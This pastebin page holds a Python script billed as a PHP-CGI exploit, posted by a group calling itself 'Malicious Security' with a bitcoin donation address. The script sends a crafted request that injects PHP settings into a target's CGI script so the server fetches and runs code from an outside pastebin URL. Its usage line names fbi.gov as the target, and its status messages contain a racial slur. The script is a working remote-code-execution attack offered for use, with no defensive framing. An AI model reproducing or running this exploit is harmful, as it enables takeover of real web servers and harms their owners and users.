Part of Slepp's ProjectsPastebinTURLImagebinFilebin
Feedback -- English French German Japanese
Create Upload Newest Tools Donate
Sign In | Create Account

Paste Actions

Download Raw
Embed
pBox URL
Post to Twitter
Remove Paste

Paste Details

Python Source format, 1 year 1 week old, and 150 hits.

Advertising

Someone
Thursday, May 10th, 2012 at 10:26:26pm MDT 

  1. ###########################################################################
  2. #                      irc.voxanon.net #malsec                            #
  3. #   _|  _|                              _|                                #
  4. # _|_|_|_|_|  _|_|_|  _|_|      _|_|_|  _|    _|_|_|    _|_|      _|_|_|  #
  5. #   _|  _|    _|    _|    _|  _|    _|  _|  _|_|      _|_|_|_|  _|        #
  6. # _|_|_|_|_|  _|    _|    _|  _|    _|  _|      _|_|  _|        _|        #
  7. #   _|  _|    _|    _|    _|    _|_|_|  _|  _|_|_|      _|_|_|    _|_|_|  #
  8. #  Malicious Security         BitCoin: 19JQAd2MvqgQsj8uGefg9XW9uGnUpUYpDG #
  9. ###########################################################################                                                                         
  10.  
  11. #################################################
  12. # usage: galaxy.py fbi.gov cgi-bin/vuln.php 80  #
  13. #################################################                                                                       
  14. import socket
  15. import sys
  16. import urllib
  17. def pwn(host, page, port):
  18.   payload = 'http://pastebin.ca/raw/2144967'
  19.   sploit = 'POST /' + page + '?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D' + payload + 'Host: ' + host + '\r\n'
  20.   sploit += 'Content-Type: application/x-www-form-urlencoded\r\n\r\n'
  21.   try:
  22.     print '[~] PHP CGI Exploit by Galaxy 2.0 [~]'
  23.     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  24.     sock.connect((host, port))
  25.     print '[+] Targ3t1ng: ' + host + ' [+]'
  26.     sock.send(sploit)
  27.     data = sock.recv(1024)
  28.     print str(data)
  29.     print '[+] 0wn1ng that sh1t n1gga [+]'
  30.     sock.close()
  31.   except socket.error, msg:
  32.     sys.stderr.write("[-] sh1t fuck3d up k1d: %s\n[-]" % msg[1])
  33.     sys.exit(1)
  34.  
  35. if __name__ == '__main__':
  36.   try:
  37.     host = sys.argv[1]
  38.     page = sys.argv[2]
  39.     port = int(sys.argv[3])
  40.     pwn(host, page, port)
  41.   except IndexError:
  42.     print '[!] Usag3: galaxy.py (host) (page) (port) [!]'
  43.     sys.exit(-1)

advertising

Update the Post

Either update this post and resubmit it with changes, or make a new post.

You may also comment on this post.

update paste below
details of the post (optional)

Note: Only the paste content is required, though the following information can be useful to others.

Save name / title?

(space separated, optional)



Please note that information posted here will expire by default in one month. If you do not want it to expire, please set the expiry time above. If it is set to expire, web search engines will not be allowed to index it prior to it expiring. Items that are not marked to expire will be indexable by search engines. Be careful with your passwords. All illegal activities will be reported and any information will be handed over to the authorities, so be good.

worth-right
fantasy-obligation